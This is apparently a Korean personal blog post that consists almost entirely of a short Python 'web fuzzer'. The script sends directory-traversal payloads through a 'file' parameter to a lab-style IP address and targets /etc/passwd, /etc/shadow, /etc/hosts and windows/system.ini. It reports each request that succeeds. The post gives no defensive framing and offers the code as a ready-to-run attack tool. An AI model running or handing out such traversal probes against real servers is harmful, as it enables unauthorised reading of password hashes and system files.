호그와트

웹 fuzzer 응애

영웅*^%&$ 2023. 1. 5. 12:35
728x90

import requests

# Set the URL and parameter to test
url = "http://10.10.146.174/assets"
parameter = "file"

# Set the list of filenames to test
filenames = [
    "../../../etc/passwd",
    "../../../etc/shadow",
    "../../../etc/hosts",
    "../../../windows/system.ini",
]

# Loop through the filenames and send a request for each one
for filename in filenames:
    payload = {parameter: filename}
    r = requests.get(url, params=payload)
    
    # If the request is successful (HTTP status code 200), print the URL and filename
    if r.status_code == 200:
        print(f"Success: {r.url}")

728x90

'호그와트' 카테고리의 다른 글

퀵 정렬 !  (0) 2023.01.08
머지 머지 정렬!  (0) 2023.01.07
간단한 시뮬레이션을 구성하는 방법  (0) 2023.01.04
solidity로 토큰 만들기  (0) 2023.01.04
난 몰러요 그런 거 나는 잘 몰러유~  (0) 2023.01.04